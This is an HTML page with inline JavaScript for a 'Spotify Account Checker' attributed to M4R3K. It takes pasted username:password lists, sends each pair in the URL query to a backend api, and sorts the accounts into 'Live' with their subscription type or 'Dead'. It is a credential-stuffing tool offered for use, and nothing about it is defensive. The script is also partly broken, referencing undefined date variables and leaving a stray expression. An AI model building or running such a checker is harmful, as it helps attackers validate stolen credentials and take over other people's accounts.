<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="description" content="Spotify Account Checker">

    <title>Spotify Account Checker</title>
<script src="js/clipboard.js"></script>
    <link href="css/bootstrap.min.css" rel="stylesheet" type="text/css" />
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300" type="text/css" />
    <style>
body {
	width: 100wh;
	height: 90vh;
	color: #fff;
	background: linear-gradient(-45deg, #EE7752, #E73C7E, #23A6D5, #23D5AB);
	background-size: 400% 400%;
	-webkit-animation: Gradient 15s ease infinite;
	-moz-animation: Gradient 15s ease infinite;
	animation: Gradient 15s ease infinite;
}
@-webkit-keyframes Gradient {
	0% {
		background-position: 0% 50%
	}
	50% {
		background-position: 100% 50%
	}
	100% {
		background-position: 0% 50%
	}
}
@-moz-keyframes Gradient {
	0% {
		background-position: 0% 50%
	}
	50% {
		background-position: 100% 50%
	}
	100% {
	background-position: 0% 50%
	}
}
@keyframes Gradient {
	0% {
		background-position: 0% 50%
	}
	50% {
		background-position: 100% 50%
	}
	100% {
		background-position: 0% 50%
	}
}
h1,
h4,
h6 {
	font-family: 'Open Sans';
	font-weight: 300;
	text-align: center;
	position: absolute;
	top: 45%;
	right: 0;
	left: 0;
}
* {
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
}
.buttons {
     display: flex;
  align-items: center;
  justify-content: center;
  	 height: 100%;
    width: 65%;
	
 }
.btn-hover {
    width: 200px;
    font-size: 16px;
    font-weight: 600;
    color: #fff;
    cursor: pointer;
    margin: 20px;
    height: 55px;
    text-align:center;
    border: none;
    background-size: 300% 100%;
    border-radius: 50px;
    moz-transition: all .4s ease-in-out;
    -o-transition: all .4s ease-in-out;
    -webkit-transition: all .4s ease-in-out;
    transition: all .4s ease-in-out;
}
.btn-hover:hover {
    background-position: 100% 0;
    moz-transition: all .4s ease-in-out;
    -o-transition: all .4s ease-in-out;
    -webkit-transition: all .4s ease-in-out;
    transition: all .4s ease-in-out;
}
.btn-hover:focus {
    outline: none;
}
.btn-hover.color-8 {
    background-image: linear-gradient(to right, #29323c, #485563, #2b5876, #4e4376);
    box-shadow: 0 4px 15px 0 rgba(45, 54, 65, 0.75);
	
}
.form-control  {
    height: 80px;
    width: 50%;
    background-color: snowwhite;
}
.alert {
    height: 50px;
    width: 50%;
    background-color: powdergreen;
}
.left {
float: left;
}
.right{
float: left;
}
</style>
	
	
</head>


<body class="fixed-left">
          
                                        
                            
<div id="wrapper">
<br><br><br>

<center> 

  <div class="alert alert-info" id="done_div" hidden>

                </div>
    <div class="clearfix"></div>
    <div class="wrapper-page">
   
	<br id="lol">
	<br id="lol">
        <div class="m-t-40 card-box">
            <div class="text-center">
                <h3 class="text-uppercase font-bold m-b-0">Spotify Account Checker</h3>  <small>Because of technical issues this doesnt check for Premium Family anymore. :(</small><br>
                <h5>Powered By <a href="https://m4r3k.me">M4R3K</a></h5>
		     <small>You can find the source <a href="https://github.com/M4R3Kcracks/OnlineSpotifyAccountChecker/">HERE</a></small><br><br>
                
        
                
	</div>
            <div class="panel-body">

              
                <h3>To Check:</h3>
                <textarea class="form-control" id="tocheck_acc" style="resize: none;vertical-align:middle;" col="95" rows="5" >Example:
username:password</textarea>

<br>

                <h3>Live:</h3>
                <textarea class="form-control" id="live_acc" style="resize: none;vertical-align:middle;" col="95" rows="5" ></textarea>
               <br> <h3 class="color-8">Dead:</h3>
                <textarea class="form-control" id="dead_acc" style="resize: none;vertical-align:middle;" col="95" rows="5" ></textarea>
    <div class="buttons">
	<container>
  <row>
			  <columns small="12" large="6">
                        <button type="button" onclick="parse_accounts();" class="left btn-hover color-8">Check</button>
                    </columns>
                <columns small="12" large="6">
				<button type="button" id="cpy"  class="right cpy btn-hover color-8"  data-clipboard-target="#live_acc" hidden>
    Copy to clipboard
</button>
 </div>
 </columns>
</div>
</container>
  </row>

            </div>
        </div>
    </div>
</div>


<!-- jQuery and Bootstrap -->
	<script src="js/bootstrap.min.js"></script>
	<script src="js/jquery.min.js"></script>


<script type="text/javascript">
var clipboard = new Clipboard('.cpy');
    function parse_accounts(){
        var accounts = $("#tocheck_acc")[0].value;
        accounts = accounts.split("\n");
        accounts.forEach(check);
        $("#done_div")[0].hidden = false;
        $("#done_div")[0].innerHTML = "<strong>Check done</strong>";
		$("#cpy")[0].hidden = false;
		$("#lol")[0].hidden = true;
    }
	var d = new Date();
var d = new Date(dateString);
var d = new Date(year, month, day, hours, minutes, seconds);
    function check(account){
        var account = account.split(":");
        var username = account[0];
        var password = account[1];
        $.get( "api/?u=" + username + "&p=" + password, function( data ) {
            var result_decoded = JSON.parse(data);
            if(result_decoded.status == "success") {
                $("#live_acc")[0].value = $("#live_acc")[0].value +  username + ":" + password + "  |  " + result_decoded.subscription +  "\n";
  $("#live_acc")[0].value +  " Checked on " + d        } else {
                $("#dead_acc")[0].value = $("#dead_acc")[0].value +  username + ":" + password + "\n";
            }
        });
    }
</script>


</body>

</html>
